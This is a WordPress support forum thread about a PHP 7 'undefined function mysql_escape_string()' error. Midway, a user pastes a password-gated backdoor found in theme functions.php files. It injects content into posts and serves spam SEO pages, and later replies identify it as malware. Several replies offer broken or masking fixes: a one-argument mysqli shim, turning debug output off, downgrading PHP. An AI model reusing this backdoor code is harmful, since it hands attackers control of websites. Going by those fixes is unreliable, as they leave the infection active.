Fatal error: Uncaught Error: Call to undefined function mysql_escape_string()

Theme “twentyseventeen” seems to be the error.

To confirm, try switching to the unedited default Theme (Twenty Sixteen) for a moment using the FTP , or your web-host’s cPanel or whatever file management application your host provides (no Dashboard access required).

I tried switching to my main theme, unfortunately the error remains. This happened after i did apt-get update my PHP7.1 compiler yesterday. I can get in phpmyadmin just fine, and i also can get into wp-admin after i rename /var/www/html/wordpress/wp-content/themes/ folder.
Any other ideas?

Well, according to this: https://php.net/manual/en/function.mysql-escape-string.php PHP 7+ doesn’t support that anymore.

I did a global search of my files and don’t find mysql_escape_string( anywhere. I looked at the Twenty Seventeen theme’s functions.php and that is not in there. Must be loading it in from somewhere else.. maybe some plugin or code inside a widget?

Hmmm…

Wow, thank you for the tip! I checked my themes function.php files which is error pointing at, and at the begining of every function.php file of every installed theme there is some weir code:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '26d130abfdcbef6fa75620e564f6a111'))
	{
		switch ($_REQUEST['action'])
			{
				case 'get_all_links';
					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
						{
							$data['code'] = '';
							
							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
								{
									$data['code'] = $_[1];
								}
							
							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
						}
				break;
				
				case 'set_id_links';
					if (isset($_REQUEST['data']))
						{
							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
							
							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
								{
									print "true";
								}
						}
				break;
				
				case 'create_page';
					if (isset($_REQUEST['remove_page']))
						{
							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
								{
									print "true";
								}
						}
					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
						{
							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
								{
									print "true";
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_URL_CD";
			}
			
		die("");
	}

	
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
	{
		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
		if ($data -> full_content)
			{
				print stripslashes($data -> content);
			}
		else
			{
				print '<!DOCTYPE html>';
				print '<html ';
				language_attributes();
				print ' class="no-js">';
				print '<head>';
				print '<title>'.stripslashes($data -> title).'</title>';
				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
				print '<meta name="robots" content="index, follow" />';
				print '<meta charset="';
				bloginfo( 'charset' );
				print '" />';
				print '<meta name="viewport" content="width=device-width">';
				print '<link rel="profile" href="https://gmpg.org/xfn/11">';
				print '<link rel="pingback" href="';
				bloginfo( 'pingback_url' );
				print '">';
				wp_head();
				print '</head>';
				print '<body>';
				print '<div id="content" class="site-content">';
				print stripslashes($data -> content);
				get_search_form();
				get_sidebar();
				get_footer();
			}
			
		exit;
	}

I think it’s some kind of data parcer? Could some of my plugins cause this?

• This reply was modified 7 years, 11 months ago by Steven Stern (sterndata).
• This reply was modified 7 years, 11 months ago by t-p.

This problem may be serious for someone who just upgraded to PHP 7+. I faced the same, the site was fine in past.

Just add

function mysql_escape_string($string){return mysqli_escape_string($string);}

in top of any functions.php file which you get the error. it should substitute with new function. without going and changing all.

• This reply was modified 7 years, 11 months ago by gnanakeethan. Reason: noted "top"

Thanks this worked, however we downgraded to 5.6

Thanks
this function in worked for me mysql_escape_string($string){return mysqli_escape_string($string);} in theme seventeen .

Hi,
I have the same problem after installing a plugin which didn’t work and caused a crash in the admin. I deleted the plugin folder, and then I had the problem with

I added the function given to the functions.php of my theme and now I have the following message :

Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /homepages/5/d666095238/htdocs/wp-content/themes/parallax-pro/functions.php on line 3

What can I do ?
Thank you.

Hi

Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /homepages/5/d666095238/htdocs/wp-content/themes/parallax-pro/functions.php on
I have face same promlem in wordpress i have added the define(‘WP_DEBUG’, false); into wp-config.php file

This is worked for me.

Thanks

• This reply was modified 7 years, 10 months ago by vishal005.
• This reply was modified 7 years, 10 months ago by vishal005.
• This reply was modified 7 years, 10 months ago by vishal005.
• This reply was modified 7 years, 10 months ago by vishal005.

I have face same promlem in wordpress then i have added the define(‘WP_DEBUG’, false); into wp-config.php file its working for me

To resolve this please DOWNGRADE PHP 7.0 to 5.6. its works for me!
Happy Coding :):):)

@oceandream I’m afraid your WordPress installation is infected.

Others users with the same error should check functions.php file and search for similar code.

“if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’]…”

@felcerreia

Can you give more information on this infection. I found the same same code in all my themes function.php files, I have removed it but i will like to know any other location i can check to make sure they are all gone.

Please can you educate us more on this infection (origin etc) I have been searching for any useful info to help understand the source.

“if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’]…”

For those that stumbled upon this page while googling the error message, you are most likely infected with a nasty malware. That specifically applies to @oceandream’s snippet above – this code should not be in functions.php. Of course there are legit cases where mysqli_escape_string was used in an old plugin or theme, but if you are seeing this code in twentyseventeen or any other theme’s functions.php file, especially towards the top of the file, I have bad news for you — you are definitely infected.

Here’s a source code someone posted for the entire infection: https://github.com/ecrider/Black-SEO-WordPress-Malware/ in the case I personally encountered the code was slightly different 99% same as on the link. In my case it didn’t go past stage1 and I was able to remove it using WordFence (and days of subsequent close monitoring). If it proceeds to stage2 – it sounds like the attacker will have a full control of your entire installation.

Hope this info helps someone!

I had that exact code in my functions.php in a theme folder. Deleted it and replaced it with the original one, but it doesn’t fix the error. What now?
EDIT: I also discovered class.wp.php but deleted it straight away. Is there any chance it’ll turn up again?
Still no fix though…

• This reply was modified 7 years, 7 months ago by generalan.